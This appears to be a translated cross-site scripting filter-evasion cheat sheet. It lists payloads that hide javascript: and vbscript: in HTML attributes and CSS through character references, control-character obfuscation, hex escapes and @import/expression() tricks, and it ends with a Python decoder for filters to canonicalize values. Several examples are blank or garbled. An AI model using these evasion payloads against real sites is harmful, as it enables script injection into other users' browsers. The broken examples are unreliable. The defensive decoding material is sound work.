1. Script insertion
(1) Insert javascript or vbscript code directly.
Example 1:
Example 2: <table background="javascript:alert(/xss/)"></table> // a script inserted through the table's background attribute
Example 3:
(2) Convert the character type. Convert some or all of the characters of javascript or vbscript into decimal or hexadecimal character references.
Example 1: // the character j converted to the decimal reference &#106;
Example 2: // the character j converted to the hexadecimal reference &#x6A;
(3) Insert obfuscation characters. Of the system control characters, all except the leading &#00 (null) and the trailing &#127 (del), that is, the other 31 characters, can be used as obfuscation characters. For example, characters such as &#01 and &#02 can be inserted at the head of javascript or vbscript, and the tab &#9, line feed &#10 and carriage return &#13 can be inserted anywhere in the code.
Example 1: // inserted at the head of the code; &#01; can also be written as &#1 with the same effect
Example 2: // inserted at any position in the code; &#09; can also be written as &#9
Example 3: // &#xd; is the hexadecimal form of the carriage return
Example 4: // &#xa; is the hexadecimal form of the line feed
2. Style Sheet
(1) XSS triggered by the CSS @import rule and the expression() property.
Example 1: @import "http://web/xss.css"; // imports a style sheet that carries XSS code
Example 2: @import javascript:alert("xss"); // the javascript scheme is invoked by the import itself
Example 3: body {xss: expression(alert(xss))} // an expression() event added to an internal style sheet
Example 4: Add an expression event to the embedded style sheet
(2) Add javascript or vbscript to the CSS code itself.
Example 1: body {background-image: url(javascript:alert("xss"))}
Example 2: body {background-image: url(vbscript:msgbox("xss"))}
(3) Convert the character type: replace some or all of the characters with hexadecimal escapes.
Example 1: @\069mport url(web/1.css); // i converted to \069
Example 2: body {xss: \065xpression(alert(xss))} // e converted to \065
Example 3: body {background-image: \075\072\06c...} // every character of url converted to hexadecimal
(4) Insert obfuscation characters. In CSS, /**/ is a comment. Besides /**/, the character "\" and the terminator "\0" are also ignored, so they can be used as obfuscation characters.
Example 1: @ importjavascept: alert ("xss ");
Example 2: @im\0p\00o\000\0000r\00000t "url";
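The filter-side counterpart to both sections above, as an added example that is not part of the original cheat sheet: before a filter can match javascript:/vbscript: in an attribute value, or @import and url() schemes in CSS, it has to canonicalize the value the way the browser does, by resolving numeric character references (with or without the trailing ";"), dropping the control characters listed in 1.(3), and collapsing CSS comments and hex escapes. The function names and the sample values are my own.

```python
import re

# Numeric character references, tolerant of a missing ';' and of leading
# zeros, exactly the variants the cheat sheet lists: &#106; &#106 &#x6A; &#01
_NUMERIC_REF = re.compile(r"&#(x[0-9a-fA-F]+|[0-9]+);?", re.IGNORECASE)
# CSS hex escapes: 1-6 hex digits, optionally followed by one whitespace
_CSS_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6})[ \t\r\n]?")
_CSS_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
# C0 controls other than NUL, plus DEL: browsers ignore these inside a URL
_CONTROLS = re.compile(r"[\x01-\x1f\x7f]")

SCRIPT_SCHEMES = ("javascript:", "vbscript:")


def _ref_to_char(match):
    ref = match.group(1)
    code = int(ref[1:], 16) if ref[0] in "xX" else int(ref, 10)
    return chr(code) if 0 < code < 0x110000 else ""


def decode_html_value(value):
    """Canonicalize an HTML attribute value: resolve numeric references
    first, then strip the control characters that browsers skip."""
    value = _NUMERIC_REF.sub(_ref_to_char, value)
    return _CONTROLS.sub("", value)


def decode_css_value(value):
    """Canonicalize a CSS value: drop comments, resolve hex escapes
    (\\069 -> 'i'), then drop NUL (\\0) and other control characters."""
    value = _CSS_COMMENT.sub("", value)
    value = _CSS_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), value)
    return _CONTROLS.sub("", value.replace("\x00", ""))


def is_script_url(value, css=False):
    """True if the canonical form of the value is a javascript:/vbscript: URL.
    For CSS the value may be wrapped in url( ... ) with optional quotes."""
    decoded = (decode_css_value(value) if css else decode_html_value(value)).strip()
    if css:
        wrapper = re.match(r"url\(\s*['\"]?", decoded, re.IGNORECASE)
        if wrapper:
            decoded = decoded[wrapper.end():]
    return decoded.lstrip().lower().startswith(SCRIPT_SCHEMES)
```

A keyword filter that runs on the raw text instead of the canonical form misses every variant in sections 1.(2), 1.(3), 2.(3) and 2.(4).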